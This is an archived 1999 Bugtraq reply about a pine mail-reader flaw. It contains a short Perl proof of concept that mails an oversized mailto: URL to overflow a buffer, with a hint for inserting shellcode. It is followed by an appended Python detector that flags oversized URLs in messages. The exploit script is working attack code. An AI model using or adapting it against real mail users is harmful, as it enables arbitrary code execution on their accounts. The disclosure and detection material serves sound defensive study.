[12705] in bugtraq


Re: Caldera Pine Advisory

daemon@ATHENA.MIT.EDU (CyberPsychotic)
Tue Nov 23 15:11:26 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.10.9911182130180.445-100000@epr0.org>
Date:         Thu, 18 Nov 1999 21:43:14 +0500
Reply-To: CyberPsychotic <fygrave@EPR0.ORG>
From: CyberPsychotic <fygrave@EPR0.ORG>
X-To:         Alfred Huger <ah@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.GSO.4.10.9911220905570.11718-100000@www.securityfocus.com>

~ :   Versions of pine prior to 4.21 had a security problem when viewing
~ :   URLs. By sending an email with a specially formatted URL embedded
~ :   in it, an attacker could cause arbitrary shell code to be executed
~ :   under the account of the victim user.
~ :

I don't know how dumb a user would have to be to actually become a victim of
such exploitation. Not saying that the bug shouldn't be fixed anywayz.
If anyone's interested:

#!/usr/bin/perl
# Build the oversized mailto: URL: 1078 bytes of filler followed by the
# bytes that land on the return address.
$sploit="A" x 1078;
$sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528
                    # or higher..
# Hand the message to the local sendmail, which reads the recipients
# from the headers (-t).
open(FOO,"| /usr/sbin/sendmail -t");
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";
close(FOO);


Pull any shellcode you like (but mind it should contain only printable
characters; 0x20-0xff worked for me).



-Fyodor
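A defensive check in the same spirit, added here as an example and not part of the original post or of pine: it walks the text parts of a message and flags any mailto: (or other) URL whose length is far beyond what a real address needs, which is exactly the shape of the proof of concept above. The 512-byte limit and the two sample messages are assumptions constructed for this example.

```python
import email
import re
from email import policy

# Assumed threshold: the proof of concept above pads the mailto: URL with
# 1078 bytes of filler, so anything beyond a few hundred bytes is suspect.
MAX_URL_LEN = 512

# Matches a URL scheme followed by everything up to whitespace or a delimiter.
URL_RE = re.compile(r'\b(?:mailto|https?|ftp):[^\s<>"]+', re.IGNORECASE)


def oversized_urls(raw_message: bytes, limit: int = MAX_URL_LEN) -> list:
    """Return (scheme, length) for every URL found in the text parts of a
    message whose total length exceeds `limit`."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        # Only text bodies are rendered by a mail reader's URL handler.
        if part.get_content_maintype() != 'text':
            continue
        body = part.get_content()
        for match in URL_RE.finditer(body):
            url = match.group(0)
            if len(url) > limit:
                scheme = url.split(':', 1)[0].lower()
                hits.append((scheme, len(url)))
    return hits


# Constructed sample messages (not real traffic): one ordinary message and one
# shaped like the proof of concept, a long run of 'A's inside a mailto: URL.
BENIGN = (b"From: a@example.org\nTo: b@example.org\n\n"
          b"Mail me: mailto:b@example.org\n")
SUSPECT = (b"From: bogus@example.org\nTo: victim@example.org\n\n"
           b"Mail me: mailto:" + b"A" * 1078 + b"@1111\n")

if __name__ == '__main__':
    for name, raw in (('benign', BENIGN), ('suspect', SUSPECT)):
        print(name, oversized_urls(raw))
```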
